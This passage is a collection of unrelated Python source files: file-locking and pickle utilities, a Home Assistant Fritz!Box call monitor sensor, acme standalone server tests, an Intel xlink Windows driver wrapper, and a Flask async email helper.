with open(self.findex, mode='r') as fp:
flist = fp.readlines()
if len(flist) < 1 : return []
flist2 = []
for t in flist :
if len(t) > 5 and t[0] != "#" :
flist2.append( t.strip() )
return flist2
def save(self, flist:list):
if len(flist) < 1 : return True
ss = ""
for fi in flist :
ss = ss + fi + "\n"
with open(self.findex, mode='a') as fp:
fp.write(ss )
return True
def save_filter(self, val:list=None):
"""
val2 = index.save_filter(flist) ### Returns only the files not already in the index
if len(val2) < 1 : continue ### Don't process flist
### Unlike IndexLock, no file lock is taken here, so the check + write is not atomic.
"""
import random, time
if val is None : return True
if isinstance(val, str):
val = [val]
i = 1
while i < self.ntry :
try :
### Check if files exist #####################
fall = self.read()
val2 = [] ; isok= True
for fi in val:
if fi in fall :
print('exist in Index, skipping', fi)
isok =False
else :
val2.append(fi)
if len(val2) < 1 : return []
#### Write the list of files on disk
ss = ""
for fi in val2 :
x = str(fi)
ss = ss + x + "\n"
with open(self.findex, mode='a') as fp:
fp.write( ss )
return val2
except Exception as e:
print(f"file lock waiting {i}s")
time.sleep( random.random() * i )
i += 1
#####################################################################################################
###### Atomic Execution ############################################################################
def os_lock_acquireLock(plock:str="tmp/plock.lock"):
''' acquire exclusive lock file access, return the locker
'''
import fcntl
os.makedirs(os.path.dirname(os.path.abspath(plock)), exist_ok=True)
locked_file_descriptor = open( plock, 'w+')
fcntl.flock(locked_file_descriptor, fcntl.LOCK_EX | fcntl.LOCK_NB)
return locked_file_descriptor
def os_lock_releaseLock(locked_file_descriptor):
''' release exclusive lock file access '''
import fcntl
fcntl.flock(locked_file_descriptor, fcntl.LOCK_UN)
# locked_file_descriptor.close()
def os_lock_execute(fun_run, fun_args=None, ntry=5, plock="tmp/plock.lock", sleep=5):
""" Run a function in an atomic way :
Write on disk exclusively on COMMON File.
"""
i = 0
while i < ntry :
try :
lock_fd = os_lock_acquireLock(plock)
fun_run(fun_args)
os_lock_releaseLock(lock_fd)
break
except Exception as e:
# log2(e)
# reduce sleep time
log2("file lock waiting", sleep, 'sec')
time.sleep(sleep)
i += 1
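# --- Illustrative sketch of the lock primitives above (paths are hypothetical; fcntl makes this POSIX-only). ---
# Two equivalent ways to serialize writes to a shared file: wrap the write in os_lock_execute,
# or take the lock explicitly around the critical section.
def _lock_example():
    os.makedirs("ztmp", exist_ok=True)

    def append_line(args):
        path, line = args
        with open(path, mode="a") as fp:
            fp.write(line + "\n")

    # 1) via os_lock_execute: retries until the exclusive lock can be taken
    os_lock_execute(append_line, ("ztmp/shared.txt", "hello"), plock="tmp/plock_demo.lock")

    # 2) explicit acquire/release (non-blocking lock, raises if already held by someone else)
    fd = os_lock_acquireLock("tmp/plock_demo.lock")
    try:
        append_line(("ztmp/shared.txt", "world"))
    finally:
        os_lock_releaseLock(fd)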
################################################################################################
def date_now(fmt = "%Y-%m-%d %H:%M:%S %Z%z"):
from pytz import timezone
from datetime import datetime
# Current time in UTC
now_utc = datetime.now(timezone('UTC'))
# Convert to Asia/Tokyo time zone
now_tokyo = now_utc.astimezone(timezone('Asia/Tokyo'))
return now_tokyo.strftime(fmt)
def time_sleep_random(nmax=5):
import random, time
time.sleep( random.randrange(nmax) )
def save(dd, to_file="", verbose=False):
import pickle, os
os.makedirs(os.path.dirname(to_file), exist_ok=True)
pickle.dump(dd, open(to_file, mode="wb") , protocol=pickle.HIGHEST_PROTOCOL)
#if verbose : os_file_check(to_file)
def load(to_file=""):
import pickle
dd = pickle.load(open(to_file, mode="rb"))
return dd
def load_serialize(name):
global pcache
#import diskcache as dc
log2("loading ", pcache)
cache = load(pcache)
return cache
# return {'a' : {'b': 2}}
def save_serialize(name, value):
global pcache
#import diskcache as dc
log2("inserting ", pcache)
save(value, pcache)
if __name__ == '__main__':
import fire
fire.Fire()
|
fritzbox_callmonitor.py
|
"""
A sensor to monitor incoming and outgoing phone calls on a Fritz!Box router.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.fritzbox_callmonitor/
"""
import logging
import socket
import threading
import datetime
import time
import re
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (CONF_HOST, CONF_PORT, CONF_NAME,
CONF_PASSWORD, CONF_USERNAME,
EVENT_HOMEASSISTANT_STOP)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
from homeassistant.util import Throttle
REQUIREMENTS = ['fritzconnection==0.6.5']
_LOGGER = logging.getLogger(__name__)
CONF_PHONEBOOK = 'phonebook'
CONF_PREFIXES = 'prefixes'
DEFAULT_HOST = '169.254.1.1' # IP valid for all Fritz!Box routers
DEFAULT_NAME = 'Phone'
DEFAULT_PORT = 1012
INTERVAL_RECONNECT = 60
VALUE_CALL = 'dialing'
VALUE_CONNECT = 'talking'
VALUE_DEFAULT = 'idle'
VALUE_DISCONNECT = 'idle'
VALUE_RING = 'ringing'
# Return cached results if phonebook was downloaded less than this time ago.
MIN_TIME_PHONEBOOK_UPDATE = datetime.timedelta(hours=6)
SCAN_INTERVAL = datetime.timedelta(hours=3)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_PASSWORD, default='admin'): cv.string,
vol.Optional(CONF_USERNAME, default=''): cv.string,
vol.Optional(CONF_PHONEBOOK, default=0): cv.positive_int,
vol.Optional(CONF_PREFIXES, default=[]):
vol.All(cv.ensure_list, [cv.string])
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up Fritz!Box call monitor sensor platform."""
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
phonebook_id = config.get(CONF_PHONEBOOK)
prefixes = config.get(CONF_PREFIXES)
try:
phonebook = FritzBoxPhonebook(
host=host, port=port, username=username, password=password,
phonebook_id=phonebook_id, prefixes=prefixes)
except: # noqa: E722 pylint: disable=bare-except
phonebook = None
_LOGGER.warning("Phonebook with ID %s not found on Fritz!Box",
phonebook_id)
sensor = FritzBoxCallSensor(name=name, phonebook=phonebook)
add_devices([sensor])
monitor = FritzBoxCallMonitor(host=host, port=port, sensor=sensor)
monitor.connect()
def _stop_listener(_event):
monitor.stopped.set()
hass.bus.listen_once(
EVENT_HOMEASSISTANT_STOP,
_stop_listener
)
return monitor.sock is not None
class FritzBoxCallSensor(Entity):
"""Implementation of a Fritz!Box call monitor."""
def __init__(self, name, phonebook):
"""Initialize the sensor."""
self._state = VALUE_DEFAULT
self._attributes = {}
self._name = name
self.phonebook = phonebook
def set_state(self, state):
"""Set the state."""
self._state = state
def set_attributes(self, attributes):
"""Set the state attributes."""
self._attributes = attributes
@property
def should_poll(self):
"""Only poll to update phonebook, if defined."""
return self.phonebook is not None
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self._attributes
def number_to_name(self, number):
"""Return a name for a given phone number."""
if self.phonebook is None:
return 'unknown'
return self.phonebook.get_name(number)
def update(self):
"""Update the phonebook if it is defined."""
if self.phonebook is not None:
self.phonebook.update_phonebook()
class FritzBoxCallMonitor:
"""Event listener to monitor calls on the Fritz!Box."""
def __init__(self, host, port, sensor):
"""Initialize Fritz!Box monitor instance."""
self.host = host
self.port = port
self.sock = None
self._sensor = sensor
self.stopped = threading.Event()
def connect(self):
"""Connect to the Fritz!Box."""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(10)
try:
self.sock.connect((self.host, self.port))
threading.Thread(target=self._listen).start()
except socket.error as err:
self.sock = None
_LOGGER.error("Cannot connect to %s on port %s: %s",
self.host, self.port, err)
def _listen(self):
"""Listen to incoming or outgoing calls."""
while not self.stopped.is_set():
try:
response = self.sock.recv(2048)
except socket.timeout:
# if no response after 10 seconds, just recv again
continue
response = str(response, "utf-8")
if not response:
# if the response is empty, the connection has been lost.
# try to reconnect
self.sock = None
while self.sock is None:
self.connect()
time.sleep(INTERVAL_RECONNECT)
else:
line = response.split("\n", 1)[0]
self._parse(line)
time.sleep(1)
def _parse(self, line):
"""Parse the call information and set the sensor states."""
line = line.split(";")
df_in = "%d.%m.%y %H:%M:%S"
df_out = "%Y-%m-%dT%H:%M:%S"
isotime = datetime.datetime.strptime(line[0], df_in).strftime(df_out)
if line[1] == "RING":
self._sensor.set_state(VALUE_RING)
att = {"type": "incoming",
"from": line[3],
"to": line[4],
"device": line[5],
"initiated": isotime}
att["from_name"] = self._sensor.number_to_name(att["from"])
self._sensor.set_attributes(att)
elif line[1] == "CALL":
self._sensor.set_state(VALUE_CALL)
att = {"type": "outgoing",
"from": line[4],
"to": line[5],
"device": line[6],
"initiated": isotime}
att["to_name"] = self._sensor.number_to_name(att["to"])
self._sensor.set_attributes(att)
elif line[1] == "CONNECT":
self._sensor.set_state(VALUE_CONNECT)
att = {"with": line[4], "device": line[3], "accepted": isotime}
att["with_name"] = self._sensor.number_to_name(att["with"])
self._sensor.set_attributes(att)
elif line[1] == "DISCONNECT":
self._sensor.set_state(VALUE_DISCONNECT)
att = {"duration": line[3], "closed": isotime}
self._sensor.set_attributes(att)
self._sensor.schedule_update_ha_state()
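# --- Illustrative sketch: the semicolon-separated line format parsed above (sample values are made up). ---
# A RING event read from the Fritz!Box call monitor port looks roughly like
#   "17.06.22 13:37:00;RING;0;0123456789;987654;SIP0;"
# i.e. timestamp;event;connection-id;from;to;device, which _parse() maps onto the sensor attributes.
def _example_parse_ring_line():
    sample = "17.06.22 13:37:00;RING;0;0123456789;987654;SIP0;"
    fields = sample.split(";")
    initiated = datetime.datetime.strptime(
        fields[0], "%d.%m.%y %H:%M:%S").strftime("%Y-%m-%dT%H:%M:%S")
    return {"type": "incoming", "from": fields[3], "to": fields[4],
            "device": fields[5], "initiated": initiated}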
class FritzBoxPhonebook:
"""This connects to a FritzBox router and downloads its phone book."""
def __init__(self, host, port, username, password,
phonebook_id=0, prefixes=None):
"""Initialize the class."""
self.host = host
self.username = username
self.password = password
self.port = port
self.phonebook_id = phonebook_id
self.phonebook_dict = None
self.number_dict = None
self.prefixes = prefixes or []
# pylint: disable=import-error
import fritzconnection as fc
# Establish a connection to the FRITZ!Box.
self.fph = fc.FritzPhonebook(
address=self.host, user=self.username, password=self.password)
if self.phonebook_id not in self.fph.list_phonebooks:
raise ValueError("Phonebook with this ID not found.")
self.update_phonebook()
@Throttle(MIN_TIME_PHONEBOOK_UPDATE)
def update_phonebook(self):
"""Update the phone book dictionary."""
self.phonebook_dict = self.fph.get_all_names(self.phonebook_id)
self.number_dict = {re.sub(r'[^\d\+]', '', nr): name
for name, nrs in self.phonebook_dict.items()
for nr in nrs}
_LOGGER.info("Fritz!Box phone book successfully updated")
def get_name(self, number):
"""Return a name for a given phone number."""
number = re.sub(r'[^\d\+]', '', str(number))
if self.number_dict is None:
return 'unknown'
try:
return self.number_dict[number]
except KeyError:
pass
if self.prefixes:
for prefix in self.prefixes:
try:
return self.number_dict[prefix + number]
except KeyError:
pass
try:
return self.number_dict[prefix + number.lstrip('0')]
except KeyError:
pass
return 'unknown'
|
standalone_test.py
|
"""Tests for acme.standalone."""
import multiprocessing
import os
import shutil
import socket
import threading
import tempfile
import unittest
import time
from contextlib import closing
from six.moves import http_client # pylint: disable=import-error
from six.moves import socketserver # type: ignore # pylint: disable=import-error
import josepy as jose
import mock
import requests
from acme import challenges
from acme import crypto_util
from acme import errors
from acme import test_util
from acme.magic_typing import Set # pylint: disable=unused-import, no-name-in-module
class TLSServerTest(unittest.TestCase):
"""Tests for acme.standalone.TLSServer."""
def test_bind(self): # pylint: disable=no-self-use
from acme.standalone import TLSServer
server = TLSServer(
('', 0), socketserver.BaseRequestHandler, bind_and_activate=True)
server.server_close() # pylint: disable=no-member
def test_ipv6(self):
if socket.has_ipv6:
from acme.standalone import TLSServer
server = TLSServer(
('', 0), socketserver.BaseRequestHandler, bind_and_activate=True, ipv6=True)
server.server_close() # pylint: disable=no-member
class TLSSNI01ServerTest(unittest.TestCase):
"""Test for acme.standalone.TLSSNI01Server."""
def setUp(self):
self.certs = {b'localhost': (
test_util.load_pyopenssl_private_key('rsa2048_key.pem'),
test_util.load_cert('rsa2048_cert.pem'),
)}
from acme.standalone import TLSSNI01Server
self.server = TLSSNI01Server(('localhost', 0), certs=self.certs)
# pylint: disable=no-member
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.start()
def tearDown(self):
self.server.shutdown() # pylint: disable=no-member
self.thread.join()
def test_it(self):
host, port = self.server.socket.getsockname()[:2]
cert = crypto_util.probe_sni(
b'localhost', host=host, port=port, timeout=1)
self.assertEqual(jose.ComparableX509(cert),
jose.ComparableX509(self.certs[b'localhost'][1]))
class HTTP01ServerTest(unittest.TestCase):
"""Tests for acme.standalone.HTTP01Server."""
def setUp(self):
self.account_key = jose.JWK.load(
test_util.load_vector('rsa1024_key.pem'))
self.resources = set() # type: Set
from acme.standalone import HTTP01Server
self.server = HTTP01Server(('', 0), resources=self.resources)
# pylint: disable=no-member
self.port = self.server.socket.getsockname()[1]
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.start()
def tearDown(self):
self.server.shutdown() # pylint: disable=no-member
self.thread.join()
def test_index(self):
response = requests.get(
'http://localhost:{0}'.format(self.port), verify=False)
self.assertEqual(
response.text, 'ACME client standalone challenge solver')
self.assertTrue(response.ok)
def test_404(self):
response = requests.get(
'http://localhost:{0}/foo'.format(self.port), verify=False)
self.assertEqual(response.status_code, http_client.NOT_FOUND)
def _test_http01(self, add):
chall = challenges.HTTP01(token=(b'x' * 16))
response, validation = chall.response_and_validation(self.account_key)
from acme.standalone import HTTP01RequestHandler
resource = HTTP01RequestHandler.HTTP01Resource(
chall=chall, response=response, validation=validation)
if add:
self.resources.add(resource)
return resource.response.simple_verify(
resource.chall, 'localhost', self.account_key.public_key(),
port=self.port)
def test_http01_found(self):
self.assertTrue(self._test_http01(add=True))
def test_http01_not_found(self):
self.assertFalse(self._test_http01(add=False))
class BaseDualNetworkedServersTest(unittest.TestCase):
"""Test for acme.standalone.BaseDualNetworkedServers."""
class SingleProtocolServer(socketserver.TCPServer):
"""Server that only serves on a single protocol. FreeBSD has this behavior for AF_INET6."""
def __init__(self, *args, **kwargs):
ipv6 = kwargs.pop("ipv6", False)
if ipv6:
self.address_family = socket.AF_INET6
kwargs["bind_and_activate"] = False
else:
self.address_family = socket.AF_INET
socketserver.TCPServer.__init__(self, *args, **kwargs)
if ipv6:
# NB: On Windows, socket.IPPROTO_IPV6 constant may be missing.
# We use the corresponding value (41) instead.
level = getattr(socket, "IPPROTO_IPV6", 41)
# pylint: disable=no-member
self.socket.setsockopt(level, socket.IPV6_V6ONLY, 1)
try:
self.server_bind()
self.server_activate()
except:
self.server_close()
raise
@mock.patch("socket.socket.bind")
def test_fail_to_bind(self, mock_bind):
mock_bind.side_effect = socket.error
from acme.standalone import BaseDualNetworkedServers
self.assertRaises(socket.error, BaseDualNetworkedServers,
BaseDualNetworkedServersTest.SingleProtocolServer,
('', 0),
socketserver.BaseRequestHandler)
def test_ports_equal(self):
from acme.standalone import BaseDualNetworkedServers
servers = BaseDualNetworkedServers(
BaseDualNetworkedServersTest.SingleProtocolServer,
('', 0),
socketserver.BaseRequestHandler)
socknames = servers.getsocknames()
prev_port = None
# assert ports are equal
for sockname in socknames:
port = sockname[1]
if prev_port:
self.assertEqual(prev_port, port)
prev_port = port
class TLSSNI01DualNetworkedServersTest(unittest.TestCase):
"""Test for acme.standalone.TLSSNI01DualNetworkedServers."""
def setUp(self):
self.certs = {b'localhost': (
test_util.load_pyopenssl_private_key('rsa2048_key.pem'),
test_util.load_cert('rsa2048_cert.pem'),
)}
from acme.standalone import TLSSNI01DualNetworkedServers
self.servers = TLSSNI01DualNetworkedServers(('localhost', 0), certs=self.certs)
self.servers.serve_forever()
def tearDown(self):
self.servers.shutdown_and_server_close()
def test_connect(self):
socknames = self.servers.getsocknames()
# connect to all addresses
for sockname in socknames:
host, port = sockname[:2]
cert = crypto_util.probe_sni(
b'localhost', host=host, port=port, timeout=1)
self.assertEqual(jose.ComparableX509(cert),
jose.ComparableX509(self.certs[b'localhost'][1]))
class HTTP01DualNetworkedServersTest(unittest.TestCase):
"""Tests for acme.standalone.HTTP01DualNetworkedServers."""
def setUp(self):
self.account_key = jose.JWK.load(
test_util.load_vector('rsa1024_key.pem'))
self.resources = set() # type: Set
from acme.standalone import HTTP01DualNetworkedServers
self.servers = HTTP01DualNetworkedServers(('', 0), resources=self.resources)
# pylint: disable=no-member
self.port = self.servers.getsocknames()[0][1]
self.servers.serve_forever()
def tearDown(self):
self.servers.shutdown_and_server_close()
def test_index(self):
response = requests.get(
'http://localhost:{0}'.format(self.port), verify=False)
self.assertEqual(
response.text, 'ACME client standalone challenge solver')
self.assertTrue(response.ok)
def test_404(self):
response = requests.get(
'http://localhost:{0}/foo'.format(self.port), verify=False)
self.assertEqual(response.status_code, http_client.NOT_FOUND)
def _test_http01(self, add):
chall = challenges.HTTP01(token=(b'x' * 16))
response, validation = chall.response_and_validation(self.account_key)
from acme.standalone import HTTP01RequestHandler
resource = HTTP01RequestHandler.HTTP01Resource(
chall=chall, response=response, validation=validation)
if add:
self.resources.add(resource)
return resource.response.simple_verify(
resource.chall, 'localhost', self.account_key.public_key(),
port=self.port)
def test_http01_found(self):
self.assertTrue(self._test_http01(add=True))
def test_http01_not_found(self):
self.assertFalse(self._test_http01(add=False))
class TestSimpleTLSSNI01Server(unittest.TestCase):
"""Tests for acme.standalone.simple_tls_sni_01_server."""
def setUp(self):
# mirror ../examples/standalone
self.test_cwd = tempfile.mkdtemp()
localhost_dir = os.path.join(self.test_cwd, 'localhost')
os.makedirs(localhost_dir)
shutil.copy(test_util.vector_path('rsa2048_cert.pem'),
os.path.join(localhost_dir, 'cert.pem'))
shutil.copy(test_util.vector_path('rsa2048_key.pem'),
os.path.join(localhost_dir, 'key.pem'))
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.bind(('', 0))
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.port = sock.getsockname()[1]
from acme.standalone import simple_tls_sni_01_server
self.process = multiprocessing.Process(target=simple_tls_sni_01_server,
args=(['path', '-p', str(self.port)],))
self.old_cwd = os.getcwd()
os.chdir(self.test_cwd)
def tearDown(self):
os.chdir(self.old_cwd)
if self.process.is_alive():
self.process.terminate()
self.process.join(timeout=5)
# Check that we didn't timeout waiting for the process to
# terminate.
self.assertNotEqual(self.process.exitcode, None)
shutil.rmtree(self.test_cwd)
@mock.patch('acme.standalone.TLSSNI01Server.handle_request')
def test_mock(self, handle):
from acme.standalone import simple_tls_sni_01_server
simple_tls_sni_01_server(cli_args=['path', '-p', str(self.port)], forever=False)
self.assertEqual(handle.call_count, 1)
def test_live(self):
self.process.start()
cert = None
for _ in range(50):
time.sleep(0.1)
try:
cert = crypto_util.probe_sni(b'localhost', b'127.0.0.1', self.port)
break
except errors.Error: # pragma: no cover
pass
self.assertEqual(jose.ComparableX509(cert),
test_util.load_comparable_cert('rsa2048_cert.pem'))
if __name__ == "__main__":
unittest.main() # pragma: no cover
|
xlink_windows_wrapper.py
|
"""
Allows API of xlink driver C library to be called in Python.
Copyright (C) 2019-2022 Intel Corporation
SPDX-License-Identifier: Apache-2.0
"""
import logging
import threading
import os
import sys
from typing import Callable
from ctypes import *
import time
from inbm_vision_lib.constants import XLINK_LIB_PATH, MAXIMUM_STORE_FILE_SIZE, XLINK_DATA_SIZE, \
NODE_BUFFER_TIMEOUT, VISION_BUFFER_TIMEOUT
from threading import Lock
from ..constants import VISION
from .ixlink_wrapper import IXlinkWrapper, HOST_DEVICE, PCIE, X_LINK_SUCCESS, xlink_global_handle, xlink_handle
logger = logging.getLogger(__name__)
class XlinkWindowsWrapper(IXlinkWrapper):
"""Wrapper class to use xlink shared library
@param receive_callback: Callback for receiving messages over xlink
@param channel_id: Channel used for xlink communication
@param pcie_num: PCIE number used in connection
@param is_boot_dev: true if xlink boot device API to be called
"""
def __init__(self, receive_callback: Callable, channel_id: int, pcie_num: int, is_boot_dev: bool):
super().__init__(XLINK_LIB_PATH,
receive_callback,
channel_id,
xlink_global_handle(prof_cfg=PCIE),
XLINK_DATA_SIZE,
xlink_handle(dev_type=HOST_DEVICE),
pcie_num)
self._xlink_handler.sw_device_id = self._xlink_pcie_num
self._is_boot_dev = is_boot_dev
self._open_channel_lock = Lock()
self._read_data_lock = Lock()
self.init_thread = threading.Thread(target=self._init_channel)
self.init_thread.start()
self._listen_thread = threading.Thread(target=self._listen_to_channel)
self._listen_thread.daemon = True
def _init_channel(self):
"""Initialize Xlink handler, connect the handler and open channel"""
logger.debug(f'{self._agent} start Xlink Windows initialization.')
self.xlink_init_status_success = False
while self._running:
status = self._xlink_library.xlink_initialize()
if status is X_LINK_SUCCESS:
break
time.sleep(1)
logger.debug(f"PCIE Number: {self._xlink_pcie_num}")
if self._is_boot_dev:
self.boot_device()
xlink_handler_p = byref(self._xlink_handler)
logger.debug('xlink_connect start connecting... Waiting for the connection...')
while self._running:
status = self._xlink_library.xlink_connect(xlink_handler_p)
if status is X_LINK_SUCCESS:
logger.debug('xlink_connect pass.')
logger.debug('xlink_open_channel. Channel ID - ' + str(self._channel_id.value))
break
logger.debug('xlink_connect start connecting... Waiting for the connection...')
time.sleep(1)
while self._running:
if self._open_channel_lock.acquire():
timeout = VISION_BUFFER_TIMEOUT if self._agent == VISION else NODE_BUFFER_TIMEOUT
try:
status = self._xlink_library.xlink_open_channel(xlink_handler_p, self._channel_id,
self._operation_type,
self._data_size, timeout * 1000)
finally:
self._open_channel_lock.release()
if status is X_LINK_SUCCESS:
logger.debug('xlink_open_channel pass. Channel ID - ' +
str(self._channel_id.value))
# Wait 5 seconds for xlink to stabilize
time.sleep(5)
self.xlink_init_status_success = True
logger.info('Xlink Windows initialization complete.')
break
else:
pass
time.sleep(1)
def get_xlink_device_status(self) -> int:
""" Check the xlink device status.
XLINK_DEV_OFF = 0,  // device is off
XLINK_DEV_ERROR,    // device HW failure is detected
XLINK_DEV_BUSY,     // device is busy and not available
XLINK_DEV_RECOVERY, // device is in recovery mode
XLINK_DEV_READY     // device is available for use
@return: status of xlink device
"""
device_status = c_int(0)
# logger.debug('Call xlink get device status for {0}'.format(
# str(self._xlink_handler.sw_device_id)))
if self._running:
status = self._xlink_library.xlink_get_device_status(
byref(self._xlink_handler), byref(device_status))
if status is not X_LINK_SUCCESS:
logger.error('xlink_get device status failed - %s', str(status))
device_status = c_int(-1)
else:
logger.debug('Closing xlink in progress. Will not disrupt it.')
device_status.value = 4
logger.debug('xlink device status for {} is {}'.format(
str(self._xlink_handler.sw_device_id), str(device_status.value)))
return device_status.value
def boot_device(self) -> None:
""" Call xlink API to boot the device.
Only the IA vision-agent boots the device. Booting the VPU FW from the node is not supported at this stage.
"""
super().boot_device()
def reset_device(self) -> None:
"""Call xlink API to reset the device"""
super().reset_device()
def _register_callback(self) -> None:
"""Register dummy callback to the xlink"""
dummy_callback = c_void_p()
status = self._xlink_library.xlink_data_available_event(byref(self._xlink_handler), self._channel_id,
dummy_callback)
if status is not X_LINK_SUCCESS:
logger.error('Xlink Data Event Failed - %s', str(status))
status = self._xlink_library.xlink_data_consumed_event(byref(self._xlink_handler), self._channel_id,
dummy_callback)
if status is not X_LINK_SUCCESS:
logger.error('Xlink Data Event Failed - %s', str(status))
logger.debug("xlink callback registered.")
def _listen_to_channel(self):
"""Listen the channel and waiting for incoming message"""
s_buffer = create_string_buffer(self._data_size)
message = POINTER(c_char)(s_buffer) # type: ignore
# Wait for xlink initialization to complete
while self._running and not self.xlink_init_status_success:
time.sleep(1)
while self._running:
size = c_uint32(XLINK_DATA_SIZE)
while self._running and self._read_data_lock.acquire():
try:
status = self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id,
byref(message), byref(size))
if status is X_LINK_SUCCESS:
break
time.sleep(0.1)
finally:
self._read_data_lock.release()
if size.value != 0:
logger.info('Received message size ' + str(size.value) + '. Message is:')
message_combined = ''
for i in range(size.value):
message_combined = message_combined + \
message[i].decode('utf-8') # type: ignore
if i == (int(size.value) - 1):
logger.info('%s', str(message_combined))
self._xlink_release_data()
if self._receive_callback is not None:
logger.info('Receive callback method exists. Calling it.')
self._receive_callback(message_combined)
def receive_file(self, file_save_path: str) -> str:
"""Receive update file and save it to the local repository.
@param file_save_path: local path to save the update file
@return : (str) received file name
"""
super()._check_directory(file_save_path)
logger.debug("Switch to receive file mode.")
s_buffer = create_string_buffer(self._data_size)
message = POINTER(c_char)(s_buffer) # type: ignore
size = c_uint32(XLINK_DATA_SIZE)
# Receive file name
while self._running:
status = self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id,
byref(message), byref(size))
if status is X_LINK_SUCCESS:
break
file_name = ""
for i in range(size.value):
file_name = file_name + message[i].decode('utf-8') # type: ignore
self._xlink_release_data()
file_path = os.path.join(file_save_path, file_name)
# Receive number of chunk
size = c_uint32(XLINK_DATA_SIZE)
while self._running:
status = self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id,
byref(message), byref(size))
if status is X_LINK_SUCCESS:
break
chunk_message = ""
for i in range(size.value):
chunk_message = chunk_message + message[i].decode('utf-8') # type: ignore
num_of_chunk = int(chunk_message)
self._xlink_release_data()
# Receive update file
logger.info("Receiving file. Please wait......")
if num_of_chunk > 1:
self._download_large_file(file_path, num_of_chunk)
else:
self._download_normal_file(file_path)
self._xlink_release_data()
logger.info("Receiving file size 100%.")
logger.info("Receive file complete. File size: %i", os.path.getsize(file_path))
logger.info("File stored at: %s", file_path)
return file_name
def _download_large_file(self, file_path: str, num_of_chunk: int):
s_buffer = create_string_buffer(self._data_size)
message = POINTER(c_char)(s_buffer) # type: ignore
size = c_uint32(XLINK_DATA_SIZE)
with open(file_path, 'wb') as update_file:
file_collect = b''
for num in range(num_of_chunk):
logger.info("{}/{}".format(num, num_of_chunk - 1))
while self._running:
status = self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id,
byref(message),
byref(size))
if status is X_LINK_SUCCESS:
break
file_collect = file_collect + message[:size.value] # type: ignore
# Write to file if the data held in memory exceeds the limit or this is the last chunk of the file.
if len(file_collect) > MAXIMUM_STORE_FILE_SIZE or num == (num_of_chunk - 1):
logger.debug("write to file")
update_file.write(file_collect) # type: ignore
update_file.flush()
file_collect = b''
if num != (num_of_chunk - 1):
self._xlink_release_data()
def _download_normal_file(self, file_path: str):
s_buffer = create_string_buffer(self._data_size)
message = POINTER(c_char)(s_buffer) # type: ignore
message_size = sys.getsizeof(message)
with open(file_path, 'wb') as update_file:
size = c_uint32(message_size)
while self._running:
status = self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id,
byref(message),
byref(size))
if status is X_LINK_SUCCESS:
break
for i in range(size.value):
# Temporary disable the progress bar as it causes slowness in simics.
# progress = receive_file_progress(i, int(size.value))
# if progress:
# logger.info("Receiving file size " + str(progress) + "%")
update_file.write(message[i]) # type: ignore
def get_init_status(self) -> bool:
""" Get the initialization status
@return: boolean representing initialization status
"""
return self.xlink_init_status_success
def start(self) -> None:
"""start to listen the receive channel"""
self._listen_thread.start()
def send(self, message) -> None:
"""Send the message through xlink write data API
@param message: message to be sent
"""
# Wait for xlink initialization to complete
while self._running and not self.get_init_status():
time.sleep(1)
if self.get_init_status() and self._running:
logger.debug('Sending message: ' + str(message))
status = self._xlink_library.xlink_write_data(byref(self._xlink_handler), self._channel_id,
message.encode('utf8'),
len(message.encode('utf8')))
super()._check_status(status, 'XLinkWriteData data failed.')
else:
logger.info('Stop XLinkWriteData')
def receive(self, message: str) -> None:
"""Receive message"""
pass
def send_file(self, file_path: str) -> None:
# inherit docstring from superclass
super().write_file_via_unsecured(file_path)
def stop(self, disconnect: bool = False) -> None:
# inherit docstring from superclass
logger.debug('Stopping Xlink.')
self._running = False
while not self._open_channel_lock.acquire():
time.sleep(0.1)
logger.debug('Open channel lock acquired.')
while not self._read_data_lock.acquire():
time.sleep(0.01)
logger.debug('read_data lock acquired.')
time.sleep(1)
logger.debug('Close Xlink channel ID - ' + str(self._channel_id.value))
self._xlink_library.xlink_close_channel(byref(self._xlink_handler), self._channel_id)
if disconnect:
# Wait 0.5s to let xlink fully close the channel before disconnecting it.
time.sleep(0.5)
logger.debug('Disconnect Xlink')
self._xlink_library.xlink_disconnect(byref(self._xlink_handler))
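# --- Illustrative driver sketch (hypothetical channel and sw_device_id values; this only runs on a host
# where the Intel xlink driver library and a PCIe-attached device are actually present). ---
# Shows the intended lifecycle of the wrapper: construct it with a receive callback, wait for the
# background channel initialization, start listening, send a message, then stop.
def _example_xlink_usage():
    def on_message(msg: str) -> None:
        logger.info("received over xlink: %s", msg)

    wrapper = XlinkWindowsWrapper(receive_callback=on_message, channel_id=1,
                                  pcie_num=0x12345678, is_boot_dev=False)
    while not wrapper.get_init_status():   # _init_channel runs in a background thread
        time.sleep(1)
    wrapper.start()                        # begin listening on the receive channel
    wrapper.send("<status>request</status>")
    wrapper.stop(disconnect=True)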
|
email.py
|
from threading import Thread
from flask_mail import Message
from app import app, mail
def send(recipient, subject, body):
"""
Send a mail to a recipient. The body is usually a rendered HTML template.
The sender's credentials have been configured in the config.py file.
"""
sender = app.config['ADMINS'][0]
message = Message(subject, sender=sender, recipients=[recipient])
message.html = body
# Create a new thread
thr = Thread(target=send_async, args=[app, message])
thr.start()
def send_async(app, message):
""" Send the mail asynchronously. """
with app.app_context():
mail.send(message)
